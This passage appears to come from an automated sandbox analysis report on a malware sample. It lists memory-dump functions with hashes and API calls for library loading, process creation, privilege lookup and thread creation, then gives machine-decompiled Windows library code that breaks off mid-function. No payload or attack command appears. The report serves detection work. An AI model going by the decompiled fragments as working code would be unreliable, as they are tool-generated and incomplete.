String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: 9f982e992dc44179eb3e84ba5bd6939514a70aa7e31f564e33ef8e21b18dfa04
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: CE018439A8022876EB20B6988C42FFEB76C9B40B51F550119FF04FA1C1E794690646E6

Uniqueness

Uniqueness Score: -1.00%

Function 02889B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02889B92

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 8c779baddadc3536fdf1c13c4dd51cb711f4d28aadc78e4904a6ba0f2a0f2cef
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: B0010CBED4020DABDF10EAA4DC41FADB7B99B44208F044195E908D7240F631EA14CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02898621, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0288CFA2,0288CFA2,?,00000000,?,?), ref: 02898660

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: ae00e7f4f2ff9ed2712f88ff6ce6c21957b343652430fe7e91fe1d9a95742ef0
Instruction ID: dc69d563893a107d58bd91b128d0817c55c801405201c74ebd1d954ba95a3884
Opcode Fuzzy Hash: ae00e7f4f2ff9ed2712f88ff6ce6c21957b343652430fe7e91fe1d9a95742ef0
Instruction Fuzzy Hash: 8BF04FB9200214AFDB14EF58DC89EE77769EF85250F058459FD4C9B242D631E910CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 0289853D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02898594

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 8e81d23053bfe49e4a922232de85ffda193b670148aee9db14b5a405ec494250
Instruction ID: 83846d5d610aba6a3c2f7cb65d496698b8b4e1d661c18676ea5828b07b0b2f9e
Opcode Fuzzy Hash: 8e81d23053bfe49e4a922232de85ffda193b670148aee9db14b5a405ec494250
Instruction Fuzzy Hash: 8A01AFB6214108AFCB54CF89DC80EEB37AAAF8C354F158258FA0DD7250C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02898540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02898594

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: eab3c815ca3902a9f785319b2936dfe21e99558502b457531448e1f87a2a370a
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: BB01AFB6210108ABCB54DF8DDC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02897010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0288CCD0,?,?), ref: 0289704C

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
Instruction ID: b79442afdef9140f9106d185e2b71a3cf561ace260c0ef13fb803fc5dd041148
Opcode Fuzzy Hash: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
Instruction Fuzzy Hash: 85E0927B3903043AE730659D9C02FABB39DCB81B20F580026FB0DEB2C0D595F80146A9

Uniqueness

Uniqueness Score: -1.00%

Function 02898502, Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02893516,?,02893C8F,02893C8F,?,02893516,?,?,?,?,?,00000000,00000000,?), ref: 028984BD

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2993800f692d8ea774e6a09f50ce00d7a9582353eaa4ac0f48351448d4084e49
Instruction ID: a8783d3304b1191d6c1e3f31780d1a6075ba23f90a9fd499ec347a285f97ae15
Opcode Fuzzy Hash: 2993800f692d8ea774e6a09f50ce00d7a9582353eaa4ac0f48351448d4084e49
Instruction Fuzzy Hash: 3CE061B91041112FD710DB9CDC44DD7B798CFC6390F148969E9CC8B202C535A50087F0

Uniqueness

Uniqueness Score: -1.00%

Function 02898456, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02893516,?,02893C8F,02893C8F,?,02893516,?,?,?,?,?,00000000,00000000,?), ref: 028984BD

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cd102ca7dde41766fab16fcd2844078dfb03bc903fd5b64b43386a050b094c64
Instruction ID: 7d8749b62ae77169b9a4ca1cfffc4d249ed7d9b012ffa920d3917bbaebb1f720
Opcode Fuzzy Hash: cd102ca7dde41766fab16fcd2844078dfb03bc903fd5b64b43386a050b094c64
Instruction Fuzzy Hash: 03F082BA6002156FDB24EF98DC84DA77769EF85360F108659FA499B241C531E9008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 02898630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0288CFA2,0288CFA2,?,00000000,?,?), ref: 02898660

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: f8747f837b0871a635d26f40b91e3afc4e0cd952d561d5470875dfaa6f5ae574
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 2EE01AB52002086BDB10DF49CC84EE737ADAF89650F018554FA0897241C930F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02898490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02893516,?,02893C8F,02893C8F,?,02893516,?,?,?,?,?,00000000,00000000,?), ref: 028984BD

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: a5086371dcba2356d39bc0a171a138e2b40bc387fefecdfa15aab2a68abd42f5
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 1FE046B5200208ABDB14EF99CC40EA777ADEF88750F158558FE089B241CA30F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0288D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02887C63,?), ref: 0288D43B

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 3c753cc605fec1ecb772b48b32a6dd48993738ca8b17303f87f45acb114f397a
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 1ED0A77A7503043BEA14FBA89C03F2A33CD5B54B04F494064F94DD73C3DA50F4004561

Uniqueness

Uniqueness Score: -1.00%

Function 0365967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03659694

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c00f43b1a1292ebc2e009dee51c76b2d45a48692ddcf4b63ad07fffe7b3d35ea
Instruction ID: 0b5726e6472f5723387d8c9fb6cb9cdd52513b3c4278f6cab8fcf42b84d4fc85
Opcode Fuzzy Hash: c00f43b1a1292ebc2e009dee51c76b2d45a48692ddcf4b63ad07fffe7b3d35ea
Instruction Fuzzy Hash: 6DB09B719024C9C5E615D7614708717794477D1741F16C061E1020651B4778C095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 036CB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 036CB38F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 036CB314
*** Resource timeout (%p) in %ws:%s, xrefs: 036CB352
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 036CB484
*** enter .exr %p for the exception record, xrefs: 036CB4F1
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 036CB39B
write to, xrefs: 036CB4A6
*** Inpage error in %ws:%s, xrefs: 036CB418
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 036CB305
The resource is owned exclusively by thread %p, xrefs: 036CB374
*** then kb to get the faulting stack, xrefs: 036CB51C
<unknown>, xrefs: 036CB27E, 036CB2D1, 036CB350, 036CB399, 036CB417, 036CB48E
The instruction at %p tried to %s , xrefs: 036CB4B6
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 036CB47D
Go determine why that thread has not released the critical section., xrefs: 036CB3C5
read from, xrefs: 036CB4AD, 036CB4B2
an invalid address, %p, xrefs: 036CB4CF
The instruction at %p referenced memory at %p., xrefs: 036CB432
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 036CB2DC
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 036CB476
*** enter .cxr %p for the context, xrefs: 036CB50D
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 036CB3D6
The resource is owned shared by %d threads, xrefs: 036CB37E
The critical section is owned by thread %p., xrefs: 036CB3B9
*** An Access Violation occurred in %ws:%s, xrefs: 036CB48F
This failed because of error %Ix., xrefs: 036CB446
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 036CB53F
a NULL pointer, xrefs: 036CB4E0
*** A stack buffer overrun occurred in %ws:%s, xrefs: 036CB2F3
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 036CB323

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: eb2e67c81e14af816aed38c17a46711e80dd05d187abd3ed178befcd1d6b2305
Instruction ID: fffa08351e5992f0f47f8bc72063fe378f39dddea07560d83f75ac224b68d95e
Opcode Fuzzy Hash: eb2e67c81e14af816aed38c17a46711e80dd05d187abd3ed178befcd1d6b2305
Instruction Fuzzy Hash: 7A81E379B50650FFCB29EA498C4BD7F7B25EF47652B44808CF1052F252E2A18852CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 036D1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E036D1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x35f48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0361B150();
				} else {
					E0361B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x370589c);
				E0361B150("Heap error detected at %p (heap handle %p)\n",  *0x37058a0);
				_t27 =  *0x3705898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M036D1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0361B150();
				} else {
					E0361B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0361B150("Error code: %d - %s\n",  *0x3705898);
				_t113 =  *0x37058a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0361B150();
					} else {
						E0361B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0361B150("Parameter1: %p\n",  *0x37058a4);
				}
				_t115 =  *0x37058a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0361B150();
					} else {
						E0361B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0361B150("Parameter2: %p\n",  *0x37058a8);
				}
				_t117 =  *0x37058ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0361B150();
					} else {
						E0361B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0361B150("Parameter3: %p\n",  *0x37058ac);
				}
				_t119 =  *0x37058b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0361B150();
					} else {
						E0361B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x37058b4);
					E0361B150("Last known valid blocks: before - %p, after - %p\n",  *0x37058b0);
				} else {
					_t120 =  *0x37058b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0361B150();
				} else {
					E0361B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0361B150("Stack trace available at %p\n", 0x37058c0);
			}

0x036d1c10
0x036d1c16
0x036d1c1e
0x036d1c3d
0x036d1c3e
0x036d1c20
0x036d1c35
0x036d1c3a
0x036d1c44
0x036d1c55
0x036d1c5a
0x036d1c65
0x036d1c67
0x00000000
0x036d1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x036d1c67
0x036d1cdc
0x036d1ce5
0x036d1d04
0x036d1d05
0x036d1ce7
0x036d1cfc
0x036d1d01
0x036d1d0b
0x036d1d17
0x036d1d1f
0x036d1d25
0x036d1d30
0x036d1d4f
0x036d1d50
0x036d1d32
0x036d1d47
0x036d1d4c
0x036d1d61
0x036d1d67
0x036d1d68
0x036d1d6e
0x036d1d79
0x036d1d98
0x036d1d99
0x036d1d7b
0x036d1d90
0x036d1d95
0x036d1daa
0x036d1db0
0x036d1db1
0x036d1db7
0x036d1dc2
0x036d1de1
0x036d1de2
0x036d1dc4
0x036d1dd9
0x036d1dde
0x036d1df3
0x036d1df9
0x036d1dfa
0x036d1e00
0x036d1e0a
0x036d1e13
0x036d1e32
0x036d1e33
0x036d1e15
0x036d1e2a
0x036d1e2f
0x036d1e39
0x036d1e4a
0x036d1e02
0x036d1e02
0x036d1e08
0x00000000
0x00000000
0x036d1e08
0x036d1e5b
0x036d1e7a
0x036d1e7b
0x036d1e5d
0x036d1e72
0x036d1e77
0x036d1e95

Strings

heap_failure_internal, xrefs: 036D1C6E
Error code: %d - %s, xrefs: 036D1D12
heap_failure_unknown, xrefs: 036D1C75
heap_failure_generic, xrefs: 036D1C7C
Heap error detected at %p (heap handle %p), xrefs: 036D1C50
heap_failure_virtual_block_corruption, xrefs: 036D1C91
heap_failure_multiple_entries_corruption, xrefs: 036D1C8A
heap_failure_listentry_corruption, xrefs: 036D1CD0
heap_failure_freelists_corruption, xrefs: 036D1CC9
Parameter3: %p, xrefs: 036D1DEE
heap_failure_block_not_busy, xrefs: 036D1CA6
heap_failure_lfh_bitmap_mismatch, xrefs: 036D1CD7
Last known valid blocks: before - %p, after - %p, xrefs: 036D1E45
Stack trace available at %p, xrefs: 036D1E86
heap_failure_usage_after_free, xrefs: 036D1CBB
heap_failure_entry_corruption, xrefs: 036D1C83
heap_failure_cross_heap_operation, xrefs: 036D1CC2
heap_failure_invalid_allocation_type, xrefs: 036D1CB4
Parameter2: %p, xrefs: 036D1DA5
HEAP[%wZ]: , xrefs: 036D1C30, 036D1CF7, 036D1D42, 036D1D8B, 036D1DD4, 036D1E25, 036D1E6D
heap_failure_invalid_argument, xrefs: 036D1CAD
heap_failure_buffer_overrun, xrefs: 036D1C98
heap_failure_buffer_underrun, xrefs: 036D1C9F
HEAP: , xrefs: 036D1C16, 036D1C3D, 036D1D04, 036D1D4F, 036D1D98, 036D1DE1, 036D1E32, 036D1E7A
Parameter1: %p, xrefs: 036D1D5C

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 73bd90eaefbb43970abd26bd93924ce3f2b517ab5680036021b2f08cfd0dfef3
Instruction ID: 62383db54e7a8e6b8a484f1c1c4b6b91d6fbbcd56cbe966d839d06adbc4c09d5
Opcode Fuzzy Hash: 73bd90eaefbb43970abd26bd93924ce3f2b517ab5680036021b2f08cfd0dfef3
Instruction Fuzzy Hash: 56612836E54654DFD285EB84E487D2573A4EB0B930B0E842EF80A5F391CBB99C518E1D

Uniqueness

Uniqueness Score: -1.00%

Function 03623D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E03623D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E03621B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E03621B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E03621B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E03621B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E03621B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03634620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0365F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03661370(_t276, 0x35f4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0365BB40(0,  &_v68, _t170);
									if(L036243C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0365BB40(_t257,  &_v68, _t243);
								if(L036243C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03661370(_t278, 0x35f4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03634620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0365F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03661370(_v16, 0x35f4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0365BB40(_t262,  &_v68, _t244);
								if(L036243C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03661370(_t282, 0x35f4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0365BB40(_t262,  &_v68, _t201);
							if(L036243C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03634620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0365F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03661370(_t280, 0x35f4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0365BB40(_t267,  &_v68, _t245);
							if(L036243C0( &_v68,  &_v24) != 0) {
